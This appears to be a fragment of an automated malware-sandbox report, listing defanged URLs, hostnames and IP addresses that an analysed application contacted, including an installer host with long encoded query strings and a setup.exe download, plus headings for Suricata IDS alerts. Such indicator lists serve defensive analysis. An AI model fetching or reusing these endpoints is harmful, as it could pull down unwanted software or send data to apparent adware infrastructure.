hxxp://install.sourceapp.info/mg?alpha=Q2QKaQIuUEMZZzMfJUMNfC1Iegcddw5VQjhpV25cFmAnP0cAW10SbDcjFW5SaXMSSQ1GE3lvR10QRkdiQzNrYQJfZkBycmY7Gh5VKTclUw0BeAw4XlVhXwgCNQoINh5FNVZiBxYYCgJsQSYWb1Mfcg88fkMEPShNHD8bNFEXJys4eS1mQnAEGD0aZlU bnwGCgZ8GmUYWGJJQFxmBwl SB8OBw8M | 70.186.131.141 |
hxxp://dl.ourclientinputsrv.com/smt2b/all/hat/row/setup.exe_d | 69.16.175.42 |
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ/xkCfyHfJr7GQ6M658NRZ4SHo/AQUCPVR6Pv+PT1kNnxoz1t4qN+5xTcCEGC2x6sSmevembHfY1acIZk= | 23.43.139.27 |
hxxp://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG+EAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEQCEHQmdFrc480Fy/u/h0ldP | 178.255.83.1 |
hxxp://ocsp2.globalsign.com/gscodesigng2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRruLd2WRFk6cRYGFIqkQ4J8hxDogQUCG7YtpyKv+0+18N0XcyAH6gvUHoCEhEhR5HFQnItXEGJJ9zEpk51tw== | 108.162.232.196 |
hxxp://install.sourceapp.info/if?alpha=fSMdXUFYdGp/eUZaMndOfGdOUEF9fxF1TEgQCUwEL39XGgRoUn50aj0yVCpQYSNBTmg/LCdSAWEkSR9XeWhjVSkRI11FQy5pUhsZQHIEcB5/Pl5dCyhxRSE3Dk4eHit6bzQ4QSlCGSwtDXxzLRUjKBB+T31ddCl3YiM+A0EtJWw+b0Z9AzgZdTtwAUhdQCxqB2xnDVFbZiVeZ0wJTR4aQ3tzX0lMNl0fKSt7YxcPRXdHWlcwJAA7H18+ZxkXAy0gEx9odSxeQVksYQJaFAE9ajVGPT4NW0g0WhdyTG4uCUAePzsBHklPBkN/cDgiHUsWJShKUXlrCjAZViMoMVgEOikiAmFXMTgYGXggTBsEBjMLcRxpalhPRDR4GX1RdV0PWQg5MRgUGjhVDS0xfn8GXRAgJVtdfzsMIAoTIXQfWkdyZmBDNwV+HB0WcigGLUpWfzJwGy8nflJEL3McMSJPHFtKHmJkHw1JLElDKW9yKBcKViw8GBQ8fVdlAlJsJUwLUnh8ZFs9ESBVQUYmeA9OQEUuDU4Ebn1OEA0NWw9wA15deUYfPzcQF1RLT35YTAZxdQJTeiVsXXskBiZVb29jDEJB | 70.186.131.141 |
dns.msftncsi.com | 131.107.255.255 |
aus3.mozilla.org | 63.245.217.138 |
www.mystartsearch.com | 69.28.57.26 |
up.soft365.com |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Map
The Application connects to the servers at the folowing location(s):